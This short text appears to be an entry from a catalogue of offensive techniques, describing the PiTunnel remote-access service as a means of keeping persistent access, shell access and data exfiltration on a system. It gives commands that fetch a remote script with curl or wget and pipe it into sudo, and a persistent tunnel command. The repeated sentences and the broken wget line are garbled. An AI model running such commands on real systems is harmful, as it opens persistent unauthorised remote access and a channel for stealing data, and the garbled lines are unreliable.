PiTunnel is free/subscription based tool which enables connecting local systems to dataplicity cloud for remotely accessing them over the internet.
Having an account created on the website, it is possible to connect any system to the PiTunnel cloud and access it remotely, keeping access over tunnels.
curl -s https://pitunnel.com/get/<TOKEN> | sudo bash
Having an account created on the website, it is possible to connect any system to the PiTunnel cloud and access it remotely, for shell-access.
wget -qO- https://pitunnel.com/get/<TOKEN>> | sudo
Having an account created on the website, it is possible to connect any system to the PiTunnel cloud and access it remotely, for data exfiltration.
pitunnel --port=<PORT> --name=vnc --persist